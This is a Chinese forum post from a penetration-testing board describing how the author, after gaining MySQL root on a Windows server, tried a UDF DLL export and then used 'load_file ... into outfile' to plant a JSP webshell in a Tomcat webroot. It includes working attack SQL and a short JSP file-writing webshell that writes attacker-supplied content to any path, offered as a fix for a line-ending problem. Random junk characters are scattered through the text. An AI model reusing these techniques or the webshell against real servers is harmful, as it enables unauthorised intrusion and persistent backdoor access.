找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 解决Win下MySQL root导出Webshell换行符问题
返回列表 发新帖
查看: 3275|回复: 0
打印 上一主题 下一主题

解决Win下MySQL root导出Webshell换行符问题

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-3-8 21:52:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天碰到了这么个问题,简单记录一下我的解决方案。% |8 N+ z, a7 X: D& _

! [  Q2 d, I: u$ Z首先说一下服务器的环境。服务器的80端口按照标准的虚拟主机来配置的,支持asp,aspx,php,但是不支持php
1 o# s0 ]( ^8 u' ]- C安装了mssql(1433端口),tomcat(8080端口),serv-u(43958端口)和两个mysql(3306端口和3307端口)
7 Z8 t: j6 u' H' B. D提权的时候没有sa密码,没有serv-u密码,mysql 5.1首先运行了7 V: f$ G; W& ~7 N, l  |9 L
1 show variables like '%plugin%';
1 A7 r% P- _( E* {* m后,根据设置导出dll到C:\Program Files\MySQL\MySQL Server 5.1\lib\成功
, U( J8 r/ k+ Y* i) d创建自定义函数似乎被拦截,一直失败。6 [! h/ o1 j/ G$ k$ G2 P& m
后找到tomcat目录,准备写马,asp,aspx,php对tomcat目录:C:/Program Files/cngradms_x86/tomcat/webapps/ROOT/均无写入权限
* c/ F9 Y. L4 \+ \% h0 _9 V测试mysql有写入权限。故上传jsp大马至网站web目录:d:\xxx\fuck.jsp
/ h+ r, N6 x& R! r用mysql执行语句:
! s* s: K& ~% ^4 N1 select load_file('d:\\xxx\\fuck.jsp')  into outfile 'C:\\Program Files\\cngradms_x86\\tomcat\\webapps\\ROOT\\upload\\fuck.jsp'
+ n  i4 u  k; i+ P0 {% i2 复制代码- H9 S' e. V+ p7 ]; s; `- f6 i7 R" [
后成功。
9 M! Y8 B7 d) r但是访问后得到如下提示:/ w8 K  X! o7 A) }1 D& Q$ f4 [
​500页面0 y/ d' a9 E1 N
8 e8 D) a" K3 I7 n' g  L

6 y/ |: s5 U: y; e5 H' H+ x1 B/ o明显是MySQL的Win下版本自动添加转义符\n\r了
; s8 w( T- G' K& M7 k% D这样导致程序运行的悲剧。
( a' Y" @! F; U: O- B从网上找了很多方法,什么update把转义符消掉,enclose巴拉巴拉,反正五花八门就是没一个可以用的。. X" F) D5 O" \4 S* t  Q! Z
最后弄了这么个小脚本:
$ Q( ?' _2 K3 p. s, w+ f01 <%@ page language="java" pageEncoding="gbk"%># D6 \2 O! H- j; u! s2 o& B4 n! c
02 <jsp:directive.page import="java.io.File"/>
9 ~0 H4 V& f. y8 F1 S' B! G3 u03 <jsp:directive.page import="java.io.OutputStream"/>
+ n! B1 f  P8 E04 <jsp:directive.page import="java.io.FileOutputStream"/>
4 {# Z/ L9 Q; h05 <% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>! f/ r* \5 w- Y8 }$ [2 Y. S
06 error www.2cto.com
! o! V4 l/ F" Z! X07 <%}}if(i==0){%>
! E9 [6 R$ [% c1 p. i/ f0 B( k08 ok
/ l( V" F% X) P& P+ G  @# |+ V09 <%}%>
8 E3 Y. f7 I3 i9 I& P5 ?1 _9 X10 <form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">
3 B# j7 \* s8 Q就可以避免转义符让JSP的马儿运行500错误了。+ X( a$ y8 f1 O: i
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表